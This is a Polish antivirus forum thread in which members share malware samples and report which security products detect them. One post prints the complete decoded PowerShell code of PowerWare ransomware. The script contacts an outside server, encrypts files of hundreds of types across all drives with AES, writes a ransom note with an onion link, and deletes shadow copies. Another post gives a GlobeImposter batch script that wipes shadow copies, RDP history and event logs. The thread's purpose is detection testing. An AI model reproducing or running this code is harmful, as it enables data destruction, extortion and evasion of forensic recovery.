Liczba postów: 485
Liczba wątków: 20
Dołączył: 26.05.2012
Reputacja:
11
18.07.2017, 06:32
(Ten post był ostatnio modyfikowany: 18.07.2017, 09:21 przez slav.)
Immunet nie widzi.Zemana AL dopiero przy skanowaniu szczegółowym wykrywa jako Trojan:Generic/Kasatura.A!Ecke
Hitman wykrywa
Eset SS wykrywa
Immunet - PC Tools Firewall Plus
Liczba postów: 7 698
Liczba wątków: 530
Dołączył: 07.10.2008
Reputacja:
468
Webroot wykrywa po uruchomieniu
[Aby zobaczyć linki, zarejestruj się tutaj]
[Aby zobaczyć linki, zarejestruj się tutaj]
Liczba postów: 4 766
Liczba wątków: 33
Dołączył: 16.02.2011
Reputacja:
507
18.07.2017, 19:30
(Ten post był ostatnio modyfikowany: 18.07.2017, 19:46 przez tachion.)
Phishing: PayPal
Win32_Ursnif
[Aby zobaczyć linki, zarejestruj się tutaj]
Działanie podobne do zbota, kradnie poufne informacje z zainfekowanego komputera, nasłuchuje sieć, kradnie certyfikaty.
Liczba postów: 956
Liczba wątków: 57
Dołączył: 25.02.2014
Reputacja:
97
(18.07.2017, 19:30)tachion napisał(a): [Aby zobaczyć linki, zarejestruj się tutaj] Win32_Ursnif
[Aby zobaczyć linki, zarejestruj się tutaj]
Działanie podobne do zbota, kradnie poufne informacje z zainfekowanego komputera, nasłuchuje sieć, kradnie certyfikaty.
Avast nie wykrywa - wysłane do labu
Avira wykrywa
Comodo nie wykrywa - wysłane do labu
[Aby zobaczyć linki, zarejestruj się tutaj]
Liczba postów: 485
Liczba wątków: 20
Dołączył: 26.05.2012
Reputacja:
11
22.07.2017, 05:16
(Ten post był ostatnio modyfikowany: 27.07.2017, 12:54 przez slav.)
Eset SS wykrywa Win32_Ursnif
Ksapersky Free też
Immunet - PC Tools Firewall Plus
Liczba postów: 4 766
Liczba wątków: 33
Dołączył: 16.02.2011
Reputacja:
507
Ransomware_PowerWare_Nemucod - wykorzystuje powershell
[Aby zobaczyć linki, zarejestruj się tutaj]
zdekodowany skrypt:
Kod: $khghcshjxnjHJJ = "HKCU:\Software\ENCR000\Scripts"
$KnnOOOjsjjfRFghcs = "Version"
if((Test-Path $khghcshjxnjHJJ) -eq $true)
{exit}
else
{
New-Item -Path $khghcshjxnjHJJ -Force | Out-Null
New-ItemProperty -Path $khghcshjxnjHJJ -Name $KnnOOOjsjjfRFghcs -Value "0" `
-PropertyType DWORD -Force | Out-Null}
$000073648732648732 = ([chaR[]](geT-RAnDOM -inpUT $(48..57 + 65..90 + 97..122) -CoUnT 49)) -jOIN ""
$467346782779685 = ([Char[]](geT-raNDOm -iNPut $(48..57 + 65..90 + 97..122) -coUNt 19)) -Join ""
$00462458234832 = ([cHaR[]](geT-RanDom -INPut $(48..57 + 65..90 + 97..122) -COuNt 24)) -join ""
$926225742886527 = "http://m1-systems.xyz/pi.php"
$910827030402006 = "string=$000073648732648732&string2=$467346782779685&uuid=$00462458234832"
$289766261002010 = nEw-OBjECT -coMOBJeCT MSxMl2.Xmlhttp
$289766261002010.oPen('PoST', $926225742886527, $faLse)
$289766261002010.sEtRequestHeader("c"+"oNTENt-TYPE","AppLIcatIoN/X-wwW-fOrM-URL"+"EnCOdeD")
$289766261002010.setReQuestHeaDer("c"+"ontENT-LengTH", $post.length)
$289766261002010.SetRequeStHeader("cONneCtiOn", "clOSe")
$289766261002010.SeNd($910827030402006)
Start-Sleep -Seconds 97
[BytE[]]$34623746238743278432462378462378=[SysTem.tExt.EnCODInG]::UniCode.GetBYtes($000073648732648732)
$JGDSDVNIUTGHBQSDGBHHFERFV = [Text.Encoding]::UTF8.GetBytes($467346782779685)
$hxTgshcYjsjdRgshxjThjsjdJ = new-ObjeCt System.SecuRity.Cryptography.RijndaelMaNaged
$hxTgshcYjsjdRgshxjThjsjdJ.Key = (new-Object Security.CryPtography.RFc2898DeriveBytes $000073648732648732, $JGDSDVNIUTGHBQSDGBHHFERFV, 5).GetBytes(32)
$hxTgshcYjsjdRgshxjThjsjdJ.IV = (neW-Object Security.Cryptography.ShA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
$hxTgshcYjsjdRgshxjThjsjdJ.Padding="ZeRos"
$hxTgshcYjsjdRgshxjThjsjdJ.Mode="CBC"
$IjhxRgsaghdWdsagdUjjsncRFhgshd= gDr|where {$_.Free}|Sort-Object -Descending
foreach($bGgxjhxRfshdjcTghajsichGhshjdj in $IjhxRgsaghdWdsagdUjjsncRFhgshd){
gci $bGgxjhxRfshdjcTghajsichGhshjdj.root -RecursE -InClude "*.yuv","*.ycbcra","*.xis","*.x3f","*.x11","*.wpd","*.tex","*.sxg","*.stx","*.st8","*.st5","*.srw","*.srf","*.sr2","*.sqlitedb","*.sqlite3","*.sqlite","*.sdf","*.sda","*.sd0","*.s3db","*.rwz","*.rwl","*.rdb","*.rat","*.raf","*.qby","*.qbx","*.qbw","*.qbr","*.qba","*.py","*.psafe3","*.plc","*.plus_muhd","*.pdd","*.p7c","*.p7b","*.oth","*.orf","*.odm","*.odf","*.nyf","*.nxl","*.nx2","*.nwb","*.ns4","*.ns3","*.ns2","*.nrw","*.nop","*.nk2","*.nef","*.ndd","*.myd","*.mrw","*.moneywell","*.mny","*.mmw","*.mfw","*.mef","*.mdc","*.lua","*.kpdx","*.kdc","*.kdbx","*.kc2","*.jpe","*.incpas","*.iiq","*.ibz","*.ibank","*.hbk","*.gry","*.grey","*.gray","*.fhd","*.fh","*.ffd","*.exf","*.erf","*.erbsql","*.eml","*.dxg","*.drf","*.dng","*.dgc","*.des","*.der","*.ddrw","*.ddoc","*.dcs","*.dc2","*.db_journal","*.csl","*.csh","*.crw","*.craw","*.cib","*.ce2","*.ce1","*.cdrw","*.cdr6","*.cdr5","*.cdr4","*.cdr3","*.bpw","*.bgt","*.bdb","*.bay","*.bank","*.backupdb","*.backup","*.back","*.awg","*.apj","*.ait","*.agdl","*.ads","*.adb","*.acr","*.ach","*.accdt","*.accdr","*.accde","*.ab4","*.3pr","*.3fr","*.vmxf","*.vmsd","*.vhdx","*.vhd","*.vbox","*.stm","*.st7","*.rvt","*.qcow","*.qed","*.pif","*.pdb","*.pab","*.ost","*.ogg","*.nvram","*.ndf","*.m4p","*.m2ts","*.log","*.hpp","*.hdd","*.groups","*.flvv","*.edb","*.dit","*.dat","*.cmt","*.bin","*.aiff","*.xlk","*.wad","*.tlg","*.st6","*.st4","*.say","*.sas7bdat","*.qbm","*.qbb","*.ptx","*.pfx","*.pef","*.pat","*.oil","*.odc","*.nsh","*.nsg","*.nsf","*.nsd","*.nd","*.mos","*.indd","*.iif","*.fpx","*.fff","*.fdb","*.dtd","*.design","*.ddd","*.dcr","*.dac","*.cr2","*.cdx","*.cdf","*.blend","*.bkp","*.al","*.adp","*.act","*.xlr","*.xlam","*.xla","*.wps","*.tga","*.rw2","*.r3d","*.pspimage","*.ps","*.pct","*.pcd","*.m4v","*.fxg","*.flac","*.eps","*.dxb","*.drw","*.dot","*.db3","*.cpi","*.cls","*.cdr","*.arw","*.ai","*.aac","*.thm","*.srt","*.save","*.safe","*.rm","*.pwm","*.pages","*.obj","*.mlb","*.md","*.mbx","*.lit","*.laccdb","*.kwm","*.idx","*.html","*.flf","*.dxf","*.dwg","*.dds","*.csv","*.css","*.config","*.cfg","*.cer","*.asx","*.aspx","*.aoi","*.accdb","*.7zip","*.1cd","*.xls","*.wab","*.rtf","*.prf","*.ppt","*.oab","*.msg","*.mapimail","*.jnt","*.doc","*.dbx","*.contact","*.n64","*.m4a","*.m4u","*.m3u","*.mid","*.wma","*.flv","*.3g2","*.mkv","*.3gp","*.mp4","*.mov","*.avi","*.asf","*.mpeg","*.vob","*.mpg","*.wmv","*.fla","*.swf","*.wav","*.mp3","*.qcow2","*.vdi","*.vmdk","*.vmx","*.wallet","*.upk","*.sav","*.re4","*.ltx","*.litesql","*.litemod","*.lbf","*.iwi","*.forge","*.das","*.d3dbsp","*.bsa","*.bik","*.asset","*.apk","*.gpg","*.aes","*.ARC","*.PAQ","*.tar.bz2","*.tbk","*.bak","*.tar","*.tgz","*.gz","*.7z","*.rar","*.zip","*.djv","*.djvu","*.svg","*.bmp","*.png","*.gif","*.raw","*.cgm","*.jpeg","*.jpg","*.tif","*.tiff","*.NEF","*.psd","*.cmd","*.bat","*.sh","*.class","*.jar","*.java","*.rb","*.asp","*.cs","*.brd","*.sch","*.dch","*.dip","*.pl","*.vbs","*.vb","*.js","*.asm","*.pas","*.cpp","*.php","*.ldf","*.mdf","*.ibd","*.MYI","*.MYD","*.frm","*.odb","*.dbf","*.db","*.mdb","*.sql","*.SQLITEDB","*.SQLITE3","*.011","*.010","*.009","*.008","*.007","*.006","*.005","*.004","*.003","*.002","*.001","*.pst","*.onetoc2","*.asc","*.lay6","*.lay","*.ms11","*.sldm","*.sldx","*.ppsm","*.ppsx","*.ppam","*.docb","*.mml","*.sxm","*.otg","*.odg","*.uop","*.potx","*.potm","*.pptx","*.pptm","*.std","*.sxd","*.pot","*.pps","*.sti","*.sxi","*.otp","*.odp","*.wb2","*.123","*.wks","*.wk1","*.xltx","*.xltm","*.xlsx","*.xlsm","*.xlsb","*.slk","*.xlw","*.xlt","*.xlm","*.xlc","*.dif","*.stc","*.sxc","*.ots","*.ods","*.hwp","*.602","*.dotm","*.dotx","*.docm","*.docx","*.DOT","*.3dm","*.max","*.3ds","*.xml","*.txt","*.CSV","*.uot","*.RTF","*.pdf","*.XLS","*.PPT","*.stw","*.sxw","*.ott","*.odt","*.DOC","*.pem","*.p12","*.csr","*.crt","*.key"|%{
try{
$sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh = New-Object SyStem.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
if ($sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.BaseStream.Length -lt 4096){
$hxTgashdnUjuwjdcTgshdnRfgshd = $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.BaseStream.Length
}
else
{
$hxTgashdnUjuwjdcTgshdnRfgshd = 4096
}
$34623746238743278432462378462378 = $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.ReadByTes($hxTgashdnUjuwjdcTgshdnRfgshd)
$sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.Close()
$xYhsjcRtsghhIIIahdhHshIOKKJ = $hxTgshcYjsjdRgshxjThjsjdJ.CreateEncRyPtor()
$YhchcRgsghxYhshdcThgh = new-Object IO.MemoryStream
$GshshdTgshxJuahxthH = new-Object Security.Cryptography.CryptoStream $YhchcRgsghxYhshdcThgh,$xYhsjcRtsghhIIIahdhHshIOKKJ,"Write"
$GshshdTgshxJuahxthH.Write($34623746238743278432462378462378, 0,$34623746238743278432462378462378.Length)
$GshshdTgshxJuahxthH.Close()
$YhchcRgsghxYhshdcThgh.Close()
$xYhsjcRtsghhIIIahdhHshIOKKJ.Clear()
$IjxmxRgshhdYHhajhxRtasghhdI = $YhchcRgsghxYhshdcThgh.ToArray()
$OlskcTshcUjsmcTgshdjJJ = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
$OlskcTshcUjsmcTgshdjJJ.Write($IjxmxRgshhdYHhajhxRtasghhdI,0,$IjxmxRgshhdYHhajhxRtasghhdI.Length)
$OlskcTshcUjsmcTgshdjJJ.Close()
$bcyHsjhjxRtgahdhPoajndcTghshcJJ = $_.Directory.ToString() + '\_README-Encrypted-Files.html'
$OkxxRtgshYHjsjcUjajxYhshjc = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGZvbnQgZmFjZT0ibW9ub3NwYWNlIj48aDE+ISEhIElNUE9SVEFOVCBJTkZPUk1BVElPTiAhISEhPC9oMT48YnI+DQoNCkFsbCBvZiB5b3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgd2l0aCBSU0EtMjA0OCBhbmQgQUVTLTEyOCBjaXBoZXJzLjxicj4NCk1vcmUgaW5mb3JtYXRpb24gYWJvdXQgdGhlIFJTQSBhbmQgQUVTIGNhbiBiZSBmb3VuZCBoZXJlOjxicj4NCjxhIGhyZWY9Imh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUlNBXyhjcnlwdG9zeXN0ZW0pIj5odHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL1JTQV8oY3J5cHRvc3lzdGVtKTwvYT48YnI+DQo8YSBocmVmPSJodHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL0FkdmFuY2VkX0VuY3J5cHRpb25fU3RhbmRhcmQiPmh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvQWR2YW5jZWRfRW5jcnlwdGlvbl9TdGFuZGFyZDwvYT48YnI+DQogICANCjxwPkRlY3J5cHRpbmcgb2YgeW91ciBmaWxlcyBpcyBPTkxZIHBvc3NpYmxlIHdpdGggdGhlIHByaXZhdGUga2V5IGFuZCBkZWNyeXB0IHByb2dyYW0sIHdoaWNoIGlzIG9uIG91ciBzZWNyZXQgc2VydmVyLjxicj4NCg0KVG8gcmVjZWl2ZSB5b3VyIHByaXZhdGUga2V5IGZvbGxvdyB0aGlzIGxpbms6PGJyPg0KDQoxLiA8YSBocmVmPSJodHRwOi8vN2h1dXlqaW9pc3RibHVjby5vbmlvbi50byI+aHR0cDovLzdodXV5amlvaXN0Ymx1Y28ub25pb24udG88L2E+PGJyPg0KDQo8cD5JZiB0aGUgYWRkcmVzcyBpcyBub3QgYXZhaWxhYmxlLCBmb2xsb3cgdGhlc2Ugc3RlcHM6PGJyPg0KMS4gRG93bmxvYWQgYW5kIGluc3RhbGwgVG9yIEJyb3dzZXI6IDxhIGhyZWY9Imh0dHBzOi8vd3d3LnRvcnByb2plY3Qub3JnL2Rvd25sb2FkL2Rvd25sb2FkLWVhc3kuaHRtbCI+aHR0cHM6Ly93d3cudG9ycHJvamVjdC5vcmcvZG93bmxvYWQvZG93bmxvYWQtZWFzeS5odG1sPC9hPjxicj4NCjIuIEFmdGVyIGEgc3VjY2Vzc2Z1bCBpbnN0YWxsYXRpb24sIHJ1biB0aGUgYnJvd3NlciBhbmQgd2FpdCBmb3IgaW5pdGlhbGl6YXRpb24uPGJyPg0KMy4gVHlwZSBpbiB0aGUgYWRkcmVzcyBiYXI6IDdodXV5amlvaXN0Ymx1Y28ub25pb248YnI+DQo0LiBGb2xsb3cgdGhlIGluc3RydWN0aW9ucyBvbiB0aGUgc2l0ZS48YnI+PC9mb250Pg=="));
if(!(Test-path($bcyHsjhjxRtgahdhPoajndcTghshcJJ))){
New-IteM -Path $bcyHsjhjxRtgahdhPoajndcTghshcJJ -ItemTyPe file -Value $OkxxRtgshYHjsjcUjajxYhshjc
AdD-Content -PAth $bcyHsjhjxRtgahdhPoajndcTghshcJJ -VaLue ("<p><font face'monospace'><h1>!!! Your Personal identification ID: $00462458234832</p></font></h1>")
}}
catch
{
}
}}
$2885456708 = Get-WmiObjEct Win32_ShadoWCopy
ForEach($019384882892 in $2885456708) {
$019384882892.Delete()
}
exit
Liczba postów: 4 766
Liczba wątków: 33
Dołączył: 16.02.2011
Reputacja:
507
Ransomware_Globeimposter
[Aby zobaczyć linki, zarejestruj się tutaj]
[Aby zobaczyć linki, zarejestruj się tutaj]
[Aby zobaczyć linki, zarejestruj się tutaj]
Kod: @echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
Liczba postów: 1 564
Liczba wątków: 21
Dołączył: 05.01.2009
Reputacja:
10
ESET NOD32 Antivirus
Zemana AntiMalware (Premium)
Liczba postów: 485
Liczba wątków: 20
Dołączył: 26.05.2012
Reputacja:
11
Immunet - PC Tools Firewall Plus
Liczba postów: 78
Liczba wątków: 0
Dołączył: 27.02.2012
Reputacja:
1
Liczba postów: 4 766
Liczba wątków: 33
Dołączył: 16.02.2011
Reputacja:
507
Polski Ransomware_ClicoCrypter
[Aby zobaczyć linki, zarejestruj się tutaj]
[Aby zobaczyć linki, zarejestruj się tutaj]
Liczba postów: 7 698
Liczba wątków: 530
Dołączył: 07.10.2008
Reputacja:
468
AppCheck Anti-Ransomware blokuje po uruchomieniu
[Aby zobaczyć linki, zarejestruj się tutaj]
Liczba postów: 956
Liczba wątków: 57
Dołączył: 25.02.2014
Reputacja:
97
(16.08.2017, 20:38)tachion napisał(a): [Aby zobaczyć linki, zarejestruj się tutaj] Polski Ransomware_ClicoCrypter
[Aby zobaczyć linki, zarejestruj się tutaj]
[Aby zobaczyć linki, zarejestruj się tutaj]
Kaspersky free - 1/1
Comodo 0/1 - Wysłane do labu.
[Aby zobaczyć linki, zarejestruj się tutaj]
Liczba postów: 37
Liczba wątków: 1
Dołączył: 10.05.2014
Reputacja:
1
(16.08.2017, 20:38)tachion napisał(a): [Aby zobaczyć linki, zarejestruj się tutaj] Polski Ransomware_ClicoCrypter
[Aby zobaczyć linki, zarejestruj się tutaj]
[Aby zobaczyć linki, zarejestruj się tutaj]
Arcabit Internet Security 1/1
Liczba postów: 1 564
Liczba wątków: 21
Dołączył: 05.01.2009
Reputacja:
10
(16.08.2017, 20:38)tachion napisał(a): [Aby zobaczyć linki, zarejestruj się tutaj] Polski Ransomware_ClicoCrypter
[Aby zobaczyć linki, zarejestruj się tutaj]
[Aby zobaczyć linki, zarejestruj się tutaj]
NOD32 wykrywa
ESET NOD32 Antivirus
Zemana AntiMalware (Premium)
Liczba postów: 4 766
Liczba wątków: 33
Dołączył: 16.02.2011
Reputacja:
507
Trojan Downloader_Hancitor_Pony
[Aby zobaczyć linki, zarejestruj się tutaj]
Liczba postów: 956
Liczba wątków: 57
Dołączył: 25.02.2014
Reputacja:
97
(17.08.2017, 21:09)tachion napisał(a): [Aby zobaczyć linki, zarejestruj się tutaj] Trojan Downloader_Hancitor_Pony
[Aby zobaczyć linki, zarejestruj się tutaj]
Kaspersky free 1/1
Comodo 0/1 - wysłane do labu
[Aby zobaczyć linki, zarejestruj się tutaj]
Liczba postów: 919
Liczba wątków: 12
Dołączył: 05.12.2015
Reputacja:
58
Ten ransom z abonamentem RTV to chyba rządowy musi być
1. Zawsze mam rację.
2. Jeśli nie mam racji, patrz pkt 1.
Liczba postów: 52
Liczba wątków: 0
Dołączył: 11.06.2015
Reputacja:
3
Co by tu powiedzieć.. witam po bardzo długiej przerwie. Zapewne tęskniliście za mną i za paczuszkami .. ale przejdźmy do rzeczy. Oprócz paczki dodaję również analizę silników antywirusowych w pliku txt.
[Malware Pack] Aug 2017 #23:
Liczba postów: 7 698
Liczba wątków: 530
Dołączył: 07.10.2008
Reputacja:
468
Windows Defender 20/23 86,95%
|